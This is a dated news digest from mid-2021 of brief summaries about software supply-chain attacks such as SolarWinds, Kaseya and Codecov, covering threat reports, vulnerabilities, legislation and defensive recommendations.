The industry has long viewed patching as an industry best practice and fundamental to any mature approach to cybersecurity. But what incidents like SolarWinds, Exchange, and Colonial Pipeline taught us was that organizations need to supplement their detection-based cybersecurity solutions – endpoint detection and response (EDR) and firewalls – and retroactive patch with a proactive cybersecurity framework that fills the gap in the middle.
Ref - SC Magazine
_______________________________________________________________________________________
(Aug 14, 2021)
Software’s supply chain security problem
Software Supply Chain attacks break the current model of Cyber Security. “Trusted” partners now have become an increasing source of risk & compromise. Attacks can involve whitelisted, or perceived legitimate, software that passes basic and advanced security checks. These attacks can have valid digital signatures or code signing, a perceived “stamp of approval” from the vendor that the backdoored software is legitimate.
_______________________________________________________________________________________
(Aug 13, 2021)
SolarWinds 2.0 could ignite financial crisis
This incident confirms that the next great financial crisis could come from a cyberattack,” superintendent of financial services Linda A. Lacewell said in a press release following the DFS’ investigation of New York’s financial services industry’s response to the supply-chain attack. Seeing hackers get access to thousands of organizations in one stroke underscores that cyberattacks threaten not just individual companies but also the stability of the financial industry as a whole.
Ref - Threatpost
_______________________________________________________________________________________
(Aug 13, 2021)
Supply chain attacks using container images
Aqua Security’s threat research team has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.
_______________________________________________________________________________________
(Aug 12, 2021)
How do supply chain attacks work?
Supply chain attacks are a new type of threat targeting software developers and suppliers. The goal is to access source code, create processes, or update mechanisms by infecting legitimate apps to distribute malware. Attackers are looking for insecure network protocols, unprotected server infrastructures, and insecure coding practices. They interrupt, change source code and hide malware in build and update processes.
_______________________________________________________________________________________
(Aug 12, 2021)
Most supply chain attacks target supplier’s code
According to the European Union Agency for Cybersecurity’s (ENISA) Threat Landscape for Supply Chain Attacks, 62% of supply chain attacks use malware as a technique. The report examined 24 supply chain attacks documented from January 2020 to early 2021. About 50% of the attacks were attributed to well-known Advanced Persistent Threat (APT) groups by the security community. The report also mentioned that strong security protection is no longer adequate for enterprises when attackers have already targeted suppliers.
_______________________________________________________________________________________
(Aug 12, 2021)
12-Year-old router vulnerability discovered exposing millions of devices for supply chain risks
Tenable security researchers discovered a 12-year router vulnerability that could allow an attacker to bypass authentication and enable a root BusyBox shell on telnet. The path traversal vulnerability CVE-2021-20090 originates from Arcadyan’s firmware used in various router brands. The vulnerability exists in the supply chain of at least 20 models from at least 17 vendors in 11 countries, including the U.S., Japan, Germany, Australia, Mexico, and New Zealand.
_______________________________________________________________________________________
(Aug 12, 2021)
Current Security Trends - software supply chain on radar
There are three areas executives can focus on to increase visibility into software supply chain security to help prevent security breaches. A leap To DevSecOps, gaining software transparency, and embracing a continuous security culture.
_______________________________________________________________________________________
(Aug 12, 2021)
Supply chain is the target for cybercriminals
The 2021 Webroot BrightCloud threat report has confirmed what many in the managed services world already know – that they are firmly in the sights of malware attacks. The management of companies and enterprises industry has shown the most significant increase in malware infections – 57% versus the global average. This highlights the fact that technology supply chains are under attack.
_______________________________________________________________________________________
(Aug 11, 2021)
Threat alert: Supply chain attacks using container images
Team Nautilus, Aqua Security’s threat research team, has uncovered several supply chain attacks that use malicious container images to compromise their victim. These five container images were found on Docker Hub, which we scan daily for signs of malicious activity. The images hijack organizations’ resources to mine cryptocurrency and can be used as part of a supply chain attack targeting cloud native environments.
Ref - AquaSec
_______________________________________________________________________________________
(Aug 10, 2021)
Black Hat 2021: Zero-days, ransoms, and supply chains
During Black Hat 2021, Corellium COO Matt Tait highlighted that there was a significant rise in the number of zero-days identified and exploited in the wild, stolen zero-days, and supply chain assaults. Tait described supply chain assaults as a whole different type of cybercrime danger. The entire economics of mass exploitation, he explains, is turned upside down because of supply chain attacks.
_______________________________________________________________________________________
(Aug 10, 2021)
Cyber-industry needs to get back to basics
There needs to be a much greater emphasis on getting the basics right in cybersecurity, according to Robert Hannigan, chairman of BlueVoyant, speaking during his Keynote address on day one of the Infosecurity Europe virtual conference, which took place from 13-15 July 2021. While the most critical vendors are generally the focus for large businesses, the less well-known suppliers in the ecosystem are typically the most vulnerable. This fact is because that might be a small company that has one person doing cybersecurity, if anyone.
Ref - Infosecurity Magazine
_______________________________________________________________________________________
(Aug 9, 2021)
3 Strategies to secure the digital supply chain
Corporate leaders and IT teams can take three steps to prioritize and remediate vulnerabilities and forestall supply chain cyberattacks. IT managers should rely more on automated tools to fix simple vulnerabilities. Businesses should conduct a cost-benefit analysis for vulnerability patching. And thirdly, procurers should demand that critical technology vendors implement “hot patching.”
Ref - HBR
_______________________________________________________________________________________
(Aug 9, 2021)
How to strengthen supply chain security
As demonstrated by the recent ransomware cybersecurity attacks, everyone suffers when a supply chain is compromised: buyers, suppliers, and users. The pace and magnitude of these and other attacks are increasing. It is clear that supply chain security needs strong oversight and control to ensure security.
_______________________________________________________________________________________
(Aug 9, 2021)
Kaseya could be the turning point for supply chain attacks
In the aftermath of Kaseya, this has been reminded that complacency can exact a terrible price. With the risk of harm no longer limited to sprawling enterprises with deep pockets, the incident should trigger new security discussions across IT departments of every size.
_______________________________________________________________________________________
(Aug 9, 2021)
Takeaways on the state of OT security and the cyber supply chain
Ensuring the integrity of the cyber supply chain is a significant challenge for OT security professionals. Supply chains continue to grow, and a recent survey indicates that organizations have an average of 27 third parties as part of their cyber supply chains, which span across different types of IT providers, OT providers, and channel partners. Many of these third parties have access to internal assets, a fact that has serious security implications.
_______________________________________________________________________________________
(Aug 9, 2021)
Kaseya VSA ransomware attack: A bombshell supply-chain hit
Large ransomware or other such attacks are promulgated and perpetuated by hackers through /third-party vendors critical to infrastructure and/or business operations. It is important to manage risk from third-party vendors by establishing a risk management process and a baseline for secure operations. Essentially that means developing and maintaining a risk register using standards-based assessments (NIST, ISO, SIG, CAIQ).
_______________________________________________________________________________________
(Aug 7, 2021)
11 Tactics to prevent supply chain attacks
Even though the SolarWinds breach was the most sophisticated cyberattack in history, there are still defense tactics organizations can implement to significantly strengthen the digital supply chain. This includes implementing Honeytokens, securing Privileged Access Management, implementing a Zero Trust Architecture, identifying all potential insider threats, and protecting vulnerable resources, etc.
Ref - Upguard
_______________________________________________________________________________________
(Aug 6, 2021)
Protecting Canada's energy supply chains from cyber threats
The Honourable Seamus O'Regan Jr., Minister of Natural Resources, today announced $407,000 in funding for the University of Waterloo to develop an enhanced cybersecurity system to protect Canada's critical energy infrastructure. The innovative hardware assurance system will be developed by the University of Waterloo and can detect compromised parts and devices, ensuring the safety and reliability of Canada's energy delivery by mitigating risks in its supply chain.
_______________________________________________________________________________________
(Aug 6, 2021)
Norsk Hyrdo’s hack highlights the need for supply chain cybersecurity
According to a recent report, when Norsk Hydro was targeted by a cyberattack in 2019, instead of paying the hackers who held their thousands of servers and PCs hostage, the company decided to consult cybersecurity experts to inspect 30,000 employee credentials and get to the root of the attack. The final culprit? An employee had opened an infected email. This approach may have left Norsk Hydro in a better position to fend off future supply-chain hacks, but it still cost the company over $70 million. It also taught them and can teach other organizations, a valuable lesson: Be prepared.
_______________________________________________________________________________________
(Aug 5, 2021)
Why you should be worried about your supplier change vendors
Software supply chain attacks target either the source code, update mechanism, or build processes of vendor software. A victim could be compromised by several vectors, including third-party software updates, the malware installed on connected devices, for example, external hard drives, cameras, phones, etc., and application installers.
_______________________________________________________________________________________
(Aug 5, 2021)
DevOps tools proliferation – A whole new world of vulnerabilities and supply chain attacks
The recent series of supply chain attacks affected tens of thousands of companies. Nowadays, CI/CD pipelines form the backbone of modern-day DevOps operations, and as we see this trend continue, we cannot ignore the urgency in protecting customer’s development environments from these pervasive attacks.
_______________________________________________________________________________________
(Aug 5, 2021)
Supply chain attacks are destined to escalate
The only way to minimize the supply chain attacks is for software platform vendors to fix the underlying technology. International or national governments can't solve the issue. Platform vendors have to step in. For Windows, that means tightening up user privileges into one that developers use so if an app gets compromised, malware's impact is reduced.
_______________________________________________________________________________________
(Aug 5, 2021)
Supply chain security remains a key puzzle
Malicious actors have successfully exploited DNS vulnerabilities on three major cloud providers, including AWS Route 53. “The root cause of the problem is the non-standard implementation of DNS resolvers that, when coupled with specific unintended edge cases on the DNS service provider’s side, cause major information leakage from internal corporate networks.
Ref - Toolbox
_______________________________________________________________________________________
(Aug 4, 2021)
Major supply chain attacks in 2021
This year alone, there have been several newsworthy attacks that deserve some attention. In a couple of stories since Kaseya and SolarWinds have been done ad nauseam at this point. Instead, we’ll pull together a couple of significant case studies to walk you through what we know now after time has passed and hopefully glean some lessons from them.
_______________________________________________________________________________________
(Aug 4, 2021)
Detecting and managing supply chain cyber risk
To actively manage supply chain risks, recommendations such as using trusted networks, information sharing, scenario planning, and quantification metrics have been broadly accepted by organizations as reputed as the World Economic Forum. These may be true, but don’t solve the problem unless deployed by all stakeholders – and that’s a tall order. A rising tide of improved risk management must start from within.
_______________________________________________________________________________________
(Aug 4, 2021)
Supply chain attacks from a managed detection and response perspective
Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.
Ref - Trend Micro
_______________________________________________________________________________________
(Aug 4, 2021)
Supply chain attacks, IoT threats on tap for Black Hat 2021
The 2020 SolarWinds attack, in which software updates for the Orion IT management platform were poisoned, brought the idea of supply chain infections into the public light. When combined with the rise in sophisticated ransomware gangs, supply chain attacks could well become the most dangerous threat facing enterprises.
Ref - TechTarget
_______________________________________________________________________________________
(Aug 4, 2021)
Protecting SMBs against Kaseya supply chain, zero-day, and ransomware attacks
To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack.
_______________________________________________________________________________________
(Aug 4, 2021)
Supply chain attacks and mass compromises are changing vendor relationships
Supply chain attacks can dramatically simplify the work that threat actors have to do around target selection, scanning the attack surface, privilege escalation, and lateral movement; things are often harder, more complex, and come with higher costs in more traditional or targeted intrusions.
_______________________________________________________________________________________
(Aug 3, 2021)
Four-fold increase in software supply chain attacks predicted in 2021 – report
The European Union has forecast there will be four times more software supply chain attacks in 2021 than there were in 2020, as cybercriminals shift to larger, cross-border targets. Among the findings, ENISA revealed that around 50% of the supply chain attacks studied were attributed to known APT groups, while 42% were not attributed to a particular source.
_______________________________________________________________________________________
(Aug 3, 2021)
What constitutes a software supply chain attack?
It’s important to remember that dependency hijacking or namespace confusion attacks occur automatically and without relying on a developer making a typographical error. This occurs as soon as a malicious dependency is pulled into the developer’s build. Dismissing these incidents as not a software supply chain issue because they lack a major security outcome isn’t wise.
_______________________________________________________________________________________
(Aug 3, 2021)
Supply chain attacks are getting worse, and you are not ready for them
The European Union Agency for Cybersecurity (ENISA) has analyzed 24 recent software supply chain attacks and concluded that strong security protection is no longer enough. It notes 11 of the supply chain attacks were conducted by known APT groups. ENISA focuses on APT supply chain attacks and notes that while the code, exploits, and malware was not considered "advanced", the planning, staging, and execution were complex tasks.
_______________________________________________________________________________________
(Aug 3, 2021)
Constant review of third-party security is critical as ransomware threat climbs
Lulled into complacency, businesses face risks of supply chain attacks even after they have done their due diligence in assessing their third-party suppliers' security posture before establishing a partnership. There is a need for continuous review of all touchpoints across their supply chain, especially those involving critical systems and data.
Ref - ZDNet
_______________________________________________________________________________________
(Aug 2, 2021)
CISA announces renewal of the ICT supply chain risk management task force
The CISA has announced the extension of the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force to July 31, 2023. The Task Force, chaired by CISA and the IT and Communications Sector Coordinating Councils, is a public-private partnership composed of a diverse range of representatives from large and small private sector organizations charged with identifying challenges and devising workable solutions and recommendations for managing risks to the global ICT supply chain.
Ref - CISA
_______________________________________________________________________________________
(Aug 2, 2021)
PyPI Python package repository patches critical supply chain flaw
The maintainers of Python Package Index (PyPI) last week issued fixes for three vulnerabilities, one among which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository. The security weaknesses were discovered and reported by Japanese security researcher RyotaK.
Ref - The Hacker News
_______________________________________________________________________________________
(Aug 2, 2021)
Today’s supply chain attacks are changing enterprise security
Analysis of several recent examples of supply chain attacks shows that adversaries are often either manipulating the code signing procedures via compromised but legitimate digital signing of certificates, hijacking the update distribution network of an ISV solution, or compromising original source code. The majority of the attackers have a high sophistication level, with the exception of the recent Kayesa attack, which leveraged an external facing service with known vulnerabilities.
_______________________________________________________________________________________
(Aug 2, 2021)
The supply chain effect in increasingly connected world
Larger supply chains are a consequence of our increasingly connected world, and feature in almost every industry from vehicle manufacturing to Dairy companies. Supply chain intermittencies and cyber-attacks that propagate through vendor-customer relations showcase that there are plenty of concerns due to the lack of accounting for the increasingly complex interconnected systems that make up our society.
Ref - Medium
_______________________________________________________________________________________
(Aug 2, 2021)
Supply chain cyber attacks expected to quadruple, says EU agency
The European Union Agency for Cybersecurity (ENISA) has found that 66 percent of supply chain attacks focus on the supplier’s code. ENISA says strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss and reputational damage.
_______________________________________________________________________________________
(August 1, 2021)
Top US prosecutors hit by suspected Russian hack
The attack on users of the software SolarWinds - which the US has blamed on Russia - was the worst-ever cyber-espionage attack on the US government. The department says 27 US attorneys had at least one office computer hacked. That has raised fears the hackers may have accessed sensitive information, including the names of informants.
Ref - BBC
_______________________________________________________________________________________
(July 31, 2021)
Organizations should validate third-party code before using it - Euro body
Half of the publicly reported supply-chain attacks were carried out by well-known APT groups, according to an analysis by EU infosec agency ENISA, which warned such digital assaults to need to drive new protective methods. Of the 24 supply-chain attacks studied by ENISA since January 2020, a dozen were attributed to APTs while 10 of them hadn't been attributed to anyone at all in open-source reporting, the agency said.
_______________________________________________________________________________________
(July 30, 2021)
Ransomware exploits and supply chain attacks lead the cyber trends in the H1 2021
Global cyber attacks increased by 29%, as hackers continue to exploit the COVID-19 pandemic and shift to remote work. The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya.
_______________________________________________________________________________________
(July 30, 2021)
There is no silver bullet for ransomware or supply chain attacks
Aaron Portnoy, the principal scientist at attack surface management specialists Randori, confesses to periodic bouts of imposter syndrome, despite having carved out a distinguished career in offensive security. According to him, the industry is witnessing dramatic changes, and there is a need for some change of approach for keeping pace with increasingly sophisticated attackers.
_______________________________________________________________________________________
(July 30, 2021)
Providers with robust cybersecurity programs also struggling with supply chain problems
According to a recent industry report, less than a quarter of hospitals, accountable care organizations (ACOs), and other healthcare providers demonstrated acceptable conformance with established framework standards. Provider organizations’ primary shortcoming in this area was their ability to validate whether their third-party suppliers and other partners are in line with their contractual security obligations.
_______________________________________________________________________________________
(July 30, 2021)
House committee approves K-12 cyber, DHS supply chain bills
The House Committee on Homeland Security approved two cybersecurity-focused bills – the K-12 Cybersecurity Act and the DHS Software Supply Chain Risk Management Act of 2021 – during a markup on July 28. The DHS Software Supply Chain Risk Management Act of 2021 aims to protect the Department of Homeland Security’s (DHS) networks from cyberattacks by modernizing how the Department procures information and communications technology or services (ICT(S)).
Ref - MeriTalk
_______________________________________________________________________________________
(July 29, 2021)
Ransomware exploits and supply chain attacks lead the cyber trends 2021
The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya. CPR also identified security flaws that would have allowed an attacker to get access to the Atlassian Jira bug system, with just one click, and get sensitive information, such as security issues on Atlassian cloud, Bitbucket, and on-premise products.
_______________________________________________________________________________________
(July 29, 2021)
Key recommendations to protect yourself from supply chain attacks
Before a decision to use a supplier is made, a full risk assessment is suggested if resources are available. You can meet the supplier's security manager or CISO, evaluate the supplier's IT resources, and ask suppliers how they prioritize risk. With this, you will get the ability to identify the risks associated with a particular supplier.
_______________________________________________________________________________________
(July 29, 2021)
Understanding the increase in supply chain security attacks
According to the new ENISA report - Threat Landscape for Supply Chain Attacks, which analyzed 24 recent attacks, strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss, and reputational damage.
_______________________________________________________________________________________
(July 29, 2021)
Supply chain security affects organizations everywhere
supply chains offer to cybercriminals a single point of failure, and multiple attack paths to exploit. Often, attackers look for a smaller organization with fewer or laxer security measures that is part of the supply chain as an entry point. Then get access to the entire network, and the ripple effect means catastrophic consequences.
Ref - TechBullion
_______________________________________________________________________________________
(July 29, 2021)
The big takeaway from the Kaseya supply chain/ransomware cyberattack
What everyone is learning after every new supply chain attack is that the battlefield on which organizations are on is considerably larger than previously imagined. The effectiveness of these supply chain shocks shows that our enterprises are also individual nodes of a much bigger macro-network. It’s a battlefield so large that drawing up a strategic defense using conventional tools and tactics won’t work.
Ref - Security Magazine
_______________________________________________________________________________________
(July 28, 2021)
Cybersecurity in supply chain management - Key risks to consider
A cybersecurity strategy depends heavily on the steps the supply chain company team takes. These four steps can help the company implement cybersecurity strategies to improve its supply chain risk management approach: fully understand the threat to the supply chain business, assess the cybersecurity measures, improve current measures and treat cybersecurity as an ongoing process.
_______________________________________________________________________________________
(July 28, 2021)
Top officials urge Commerce Department to confront growing cybersecurity risks
U.S. Sens. Roger Wicker, R-Miss., and Maria Cantwell, D-Wash., ranking member and chair of the Senate Committee on Commerce, Science, and Transportation, sent a letter urging Department of Commerce (DOC) Secretary Gina Raimondo to implement and appropriately resource Congressional direction on growing the cybersecurity workforce. According to them, DOC should continue addressing cybersecurity supply chain risk, including by updating and, as appropriate, encouraging the adoption of software supply chain best practices.
Ref - Senate.gov
_______________________________________________________________________________________
(July 28, 2021)
Where does the SME fit into a supply chain attack?
SMEs like MEDoc and Inbenta are frequently the target of supply chain attacks. Firstly, they are unlikely to have the security resources of the bigger companies they supply, so they are targeted as a stepping stone for larger attacks against bigger customers. But they are also targeted via their own supply chains. With supply chain attacks being a major growth area for cybercriminals, this is a worsening scenario.
_______________________________________________________________________________________
(July 27, 2021)
With software supply chain security, developers have a big role to play
Securing the software supply chain entails knowing exactly what components are being used in the software products, everything that impacts the code as it goes from development to production. This includes having visibility into even the code you didn't write, like open-source or third-party dependencies, or any other artifacts, and being able to prove their provenance.
Ref - Google
_______________________________________________________________________________________
(July 27, 2021)
Kaseya denies ransomware payment as it hails ‘100% effective’ decryption tool
Kaseya has denied rumors that it paid a ransom to the REvil cybercrime gang as it continues to roll out a decryptor to victims of a recent ransomware attack. The update sparked speculation as to the identity of the unnamed third party, with Allan Liska of Recorded Future’s CSIRT team positing a disgruntled REvil affiliate, the Russian government, or that Kaseya themselves had paid the ransom.
_______________________________________________________________________________________
(July 27, 2021)
Protecting the supply chain from Kaseya-like attacks
To protect from Kaseya-like attacks, the end customer should have a solid understanding of their entire software bill of materials(SBOM) and have a regular dialog with its suppliers on current security posture and improvements. Dialog, not dictation, is important here. A component of understanding one’s supplier network is reducing it where possible.
_______________________________________________________________________________________
(July 27, 2021)
How network segmentation can protect supply chains from ransomware attacks
Network segmentation has proven helpful in mitigating common ransomware attacks especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with the main benefits of network segmentation. It eliminates network congestion, resulting in overall improved performance, and improves intrusion control by making it easy to contain detected threats. Moreover, it minimizes access to specific sensitive data and information by zoning them to a more secure network.
_______________________________________________________________________________________
(July 26, 2021)
Why code signing best practices are vital to hardening security?
Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.
_______________________________________________________________________________________
(July 26, 2021)
When software updates get hacked
The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.
_______________________________________________________________________________________
(July 23, 2021)
Supply-chain threats and client-side vulnerabilities
The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.
_______________________________________________________________________________________
(July 23, 2021)
Kaseya Ransomware attack explained
REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to their customers and their systems. From there, the ransomware gang began using weaknesses on those systems to encrypt everything. Since the malware is already wrapped in the platform, it’s been signed by Kaseya’s platform. As a result, the malware is getting past everything on these client’s systems.
Ref - PurpleSec
_______________________________________________________________________________________
(July 23, 2021)
The lessons to be learned from the Colonial Pipeline attack
The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.
_______________________________________________________________________________________
(July 23, 2021)
Kaseya gets master decryptor to help customers still suffering from REvil attack
Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.
Ref - ARS Technica
_______________________________________________________________________________________
(July 23, 2021)
Getting ahead of supply-chain risks
Supply chains have become so global has created new risk in terms of the reliability and the availability of certain things. To make sure that these supply chains are properly managed, it’s important to understand where the risk is, getting ahead of it, and anticipating security needs and addressing them before they become problems.
_______________________________________________________________________________________
(July 22, 2021)
Tracking the trail of software: The key to boosting security
There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.
_______________________________________________________________________________________
(July 22, 2021)
DevSecOps: The key to securing supply chain in a multi-cloud threatscape
DevSecOps is all about: leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention, they will add business value as they deliver safer products and services that better protect their businesses and customers.
_______________________________________________________________________________________
(July 22, 2021)
Things that changed after the SolarWinds attack
One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.
_______________________________________________________________________________________
(July 22, 2021)
Who is responsible for improving security in the software development environment?
Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.
_______________________________________________________________________________________
(July 21, 2021)
New bill would make some companies report cyberattacks to the government
A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.
_______________________________________________________________________________________
(July 21, 2021)
Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced
A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.
_______________________________________________________________________________________
(July 21, 2021)
A risk management cybersecurity imperative for State, Local & Tribal Governments
The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government as many agency networks data were presumably compromised. The extent of the damage from Solar Winds (and other recent breaches) is still being investigated and mitigated. The cyber breach not only impacted federal systems, but also the state, local, and Tribal governments (SLTG) and databases.
_______________________________________________________________________________________
(July 20, 2021)
Why securing against IT supply chain attacks is crucial
Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.
_______________________________________________________________________________________
(July 20, 2021)
Top 5 things to know about supply chain attacks
There are 5 key things to know about supply chain attacks. It doesn’t attack the victims directly, but it targets its suppliers. It can affect almost any industry, including Financial, energy, manufacturing, transportation. It may or may not involve either hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several possible ways to safeguard against such threats.
_______________________________________________________________________________________
(July 19, 2021)
How to prevent supply chain attacks by securing DevOps
With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.
_______________________________________________________________________________________
(July 19, 2021)
Biden Administration blames hackers tied to China for Microsoft cyberattack spree
The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(July 19, 2021)
Breaking down the threat of going all-in with Microsoft security
Recent cyber events over the last several months have highlighted a critical need for enterprises to break free from depending on one vendor for security to limit risk. Having an unsegmented body of the ship means it would be prone to sinking very quickly when damaged. On the other hand, companies that segment their security infrastructure with multiple vendors are like ships with several compartments. When one area is compromised, the whole ship isn't immediately exposed.
_______________________________________________________________________________________
(July 19, 2021)
Kaseya ransomware attack FAQ
According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.
_______________________________________________________________________________________
(July 18, 2021)
Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems
President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.
_______________________________________________________________________________________
(July 17, 2021)
CloudFlare CDNJS bug could have led to widespread supply-chain attacks
Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise
_______________________________________________________________________________________
(July 16, 2021)
Several security pros not confident about supply chain attack security - Report
According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with the exact percentage also saying their development teams are responsible.
_______________________________________________________________________________________
(July 16, 2021)
Kaseya attack - How to fight this unique attack technique
Kaseya attack is different from other usual ransomware attacks. It started with a zero-day, and that's unusual. It's hard to say best practice in terms of avoiding this. Moreover, the companies that were infected, were following best practices. There were some mistakes like the platform being used shouldn't have been exposed to the internet. It was mostly exposed so that people could remote work because of the pandemic and to make more online availability. And it looks like that there was an overuse of what are called endpoint protection exclusions.
Ref - Tech Republic
_______________________________________________________________________________________
(July 15, 2021)
With software supply chain attacks escalating, who is responsible for increasing security
According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.
Ref - Yahoo
_______________________________________________________________________________________
(July 15, 2021)
iOS zero-day let SolarWinds hackers compromise fully updated iPhones
The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.
_______________________________________________________________________________________
(July 14, 2021)
Targeted attack activity heightens need for firms to patch new SolarWinds flaw
Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.
_______________________________________________________________________________________
(July 13, 2021)
Microsoft discovers threat actor targeting SolarWinds software
Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.
Ref - Microsoft
_______________________________________________________________________________________
(July 13, 2021)
Identity administration platform may be the weak link post-RMM supply-chain attack
Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access and push the malicious executables to endpoints are forcing security teams to re-evaluate such centralized platforms with very large blast radius. Such issues have again shown the need for the organizations to move to infrastructure designed with Zero-trust principles in mind.
Ref - Medium
_______________________________________________________________________________________
(July 13, 2021)
Microsoft discovers critical SolarWinds zero-day under active attack
An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.
_______________________________________________________________________________________
(July 12, 2021)
SolarWinds patches critical Serv-U vulnerability exploited in the wild
SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.
_______________________________________________________________________________________
(July 12, 2021)
SolarWinds confirms new zero-day flaw under attack
